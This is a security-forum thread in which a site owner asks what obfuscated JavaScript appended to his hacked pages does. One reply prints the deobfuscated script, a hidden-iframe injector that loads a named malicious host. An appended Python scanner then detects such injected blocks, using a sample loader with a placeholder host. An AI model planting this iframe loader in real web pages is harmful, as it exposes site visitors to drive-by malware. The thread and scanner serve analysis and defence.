mrconsumer Just Arrived
Joined: 24 Jul 2007 Posts: 0
Posted: Tue Jul 24, 2007 8:15 pm Post subject: What Does This Hack Do?
Three of my websites were compromised last week, and the following code (or variations of it) was added as the last line of every HTM and PHP file in the root directory.
Can anyone tell me what this does or how to decipher it? (I can provide a text file with this for anyone interested.)
Thanks,
MrConsumer
Advocate Just Arrived
Joined: 31 Aug 2006 Posts: 0 Location: Amsterdam, NL
Posted: Mon Jul 30, 2007 11:20 am Post subject:
It looks like obfuscated JavaScript to be honest...
I haven't got time to confirm what it does at the moment, but maybe someone else can have a shot. Additionally, you could attempt to run it in an isolated virtual environment and have a look!
icujc Just Arrived
Joined: 21 Apr 2005 Posts: 2
mrconsumer Just Arrived
Joined: 24 Jul 2007 Posts: 0
Posted: Tue Jul 31, 2007 1:29 pm Post subject:
I will be happy to provide a text file of the offending code via email. I didn't want to create a situation where this thing could harm someone viewing it, so I turned it into a .gif.
Also, Sophos has analyzed the file, and is adding it to their virus list (but I still don't know what it purportedly would do):
http://www.sophos.com/security/analyses/trojpintadda.html
Edgar
lrebrown Just Arrived
Joined: 08 Dec 2005 Posts: 0 Location: UK
Posted: Tue Jul 31, 2007 4:58 pm Post subject:
You don't need to worry about harming anyone viewing it. When posting your message, the HTML (e.g. the <script> tag) will either be stripped from your post, or characters like < and > will be encoded to make them harmless (they will display as text on the page rather than being parsed as HTML tags).
It's perfectly safe to post it here, so long as the forum is protected against XSS attacks (which it most certainly will be).
mrconsumer Just Arrived
Joined: 24 Jul 2007 Posts: 0
The_Real_Gandalf Trusted SF Member
Joined: 14 Apr 2004 Posts: 0 Location: Athens, Greece
Posted: Tue Sep 25, 2007 10:25 am Post subject:
It shows like an incomplete source code for a virus ID string. I do not think that it is fully functional, but the best way to test it is to "install/run" it on an isolated machine with all services running (e.g. WWW, IIS, etc.)
Gandalf
jumperinthedoor Just Arrived
Joined: 30 Oct 2007 Posts: 0
Posted: Wed Oct 31, 2007 11:52 pm Post subject:
It is obfuscated JavaScript. It does function and sets an iFrame to 24.update1.classictel.org/html/. This is a site belonging to the Russian Business Network. I tried to wget 24.update1.classictel.org/html/ to see what malware it was hosting, but I can't get there because we block it here. Anyway, here is the unobfuscated script:
function fp(yR,qd){
  // Set cookie yR=qd, expiring 24 hours (86400000 ms) from now
  var jM=new Date();
  var Jr=new Date();
  Jr.setTime(jM.getTime()+86400000);
  document.cookie = yR+"="+escape(qd)+"; expires="+Jr.toGMTString();
}
// Cookie name/value used as an "already injected" marker, plus the target host and path
var qh='s1fTc',pG='1';
var oX='update1.classictel.org',Lt='/html/';
if(document.cookie.indexOf(qh+'='+pG)==-1){
  // Build the iframe URL: the visited site's hostname and a random label become subdomains of the target host
  var FD='http://'+(document.location.host != ''?'':RC())+document.location.host.replace(/[^a-z0-9.-]/,'.').replace(/\.+/,'.')+'.'+RC()+'.'+oX+Lt;
  var ft=document.createElement('iframe');
  ft.setAttribute('src',FD);ft.frameBorder=0; ft.width=4;
  ft.height=4;
  try {
    document.body.appendChild(ft);
    fp(qh,pG);
  }
  catch(e){
    // No body yet (script ran before it existed): write an empty one and retry
    document.write('<html><body></body></html>');
    document.body.appendChild(ft); fp(qh,pG);
  }
}
function RC(){
  // 24 random characters drawn from FR (note the doubled '0' in the alphabet)
  var KO=24,FR="01234567890abcdef";
  var na="";
  for(BC=0; BC < KO; BC++) na+= FR.substr(Math.floor(Math.random()*FR.length),1,1);
  return na;
}
Update: The site 24.update1.classictel.org/html/ redirects to another site that was taken down by the hosting provider.
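As an added example (not code from the thread or from any of its posters), the following Python script does two things the thread discusses: it scans .htm/.html/.php files for a <script> block appended as the last thing in the file, the placement the first post describes, and checks that block for the hidden-iframe markers visible in the deobfuscated script above; it also renders any finding HTML-escaped, which is the encoding lrebrown describes, so the snippet can be pasted into a forum post without being parsed as markup. The marker substrings are taken from the script posted above; the sample files, the placeholder host example.invalid and all function names are constructed for this example.

```python
"""Added example, not code from the thread: detect a <script> block appended after the
end of web files, check it for the hidden-iframe markers seen in the thread's
deobfuscated script, and render findings HTML-escaped for safe sharing."""
import html
import re
import tempfile
from pathlib import Path
from typing import Optional

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)

# Substrings taken from the deobfuscated script posted in the thread. A file that
# ends in a script block containing several of them deserves a close look.
MARKERS = (
    "createelement('iframe')",
    "setattribute('src'",
    "document.cookie",
    "frameborder=0",
)


def appended_script(text: str) -> Optional[str]:
    """Return the final <script> block if it is the last thing in the file, else None.

    A normal HTML page ends in </html> and a normal PHP file in code or ?>, so a file
    whose last non-blank content is a script block has had something appended to it.
    """
    body = text.rstrip()
    if not body.lower().endswith("</script>"):
        return None
    matches = list(SCRIPT_RE.finditer(body))
    return matches[-1].group(0) if matches else None


def matched_markers(snippet: str) -> list[str]:
    """Return the known hidden-iframe markers that occur in the snippet (case-insensitive)."""
    low = snippet.lower()
    return [m for m in MARKERS if m in low]


def scan_texts(files: dict[str, str]) -> dict[str, list[str]]:
    """Map each file name to the markers found in its appended script block.
    Files with no appended block are left out of the result."""
    findings = {}
    for name, text in files.items():
        snippet = appended_script(text)
        if snippet is not None:
            findings[name] = matched_markers(snippet)
    return findings


def scan_directory(root: Path, suffixes=(".htm", ".html", ".php")) -> dict[str, list[str]]:
    """Read every file with a web suffix under root and scan it."""
    texts = {
        str(p.relative_to(root)): p.read_text(errors="replace")
        for p in root.rglob("*")
        if p.is_file() and p.suffix.lower() in suffixes
    }
    return scan_texts(texts)


def safe_report(files: dict[str, str]) -> str:
    """HTML-escape each appended snippet so < and > display as text, not as tags."""
    lines = []
    for name, text in files.items():
        snippet = appended_script(text)
        if snippet is not None:
            lines.append(f"{html.escape(name)}: {html.escape(snippet)}")
    return "\n".join(lines)


# Constructed samples: a clean page, a page with a hidden-iframe loader appended
# (placeholder host, not the one named in the thread), and a PHP file with an
# appended but marker-free script tag.
CLEAN_PAGE = "<html><body><p>hello</p></body></html>\n"
INJECTED_PAGE = CLEAN_PAGE + (
    "<script>var ft=document.createElement('iframe');"
    "ft.setAttribute('src','http://example.invalid/html/');ft.frameBorder=0;"
    "document.body.appendChild(ft);document.cookie='s1fTc=1';</script>\n"
)
INJECTED_PHP = "<?php echo 'x'; ?>\n<script src='x.js'></script>\n"

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.htm").write_text(CLEAN_PAGE)
        (root / "about.htm").write_text(INJECTED_PAGE)
        (root / "page.php").write_text(INJECTED_PHP)
        for name, hits in scan_directory(root).items():
            print(f"{name}: {len(hits)} marker(s) {hits}")
        print(safe_report({"about.htm": INJECTED_PAGE}))
```

Run it against the document root of a site that was hit and it lists every file whose final content is a script block, with the marker count as a rough priority; a file with an appended block but zero markers (like the sample PHP file) still warrants a look, since the obfuscated form of the loader will not contain the plain-text markers until it has been decoded.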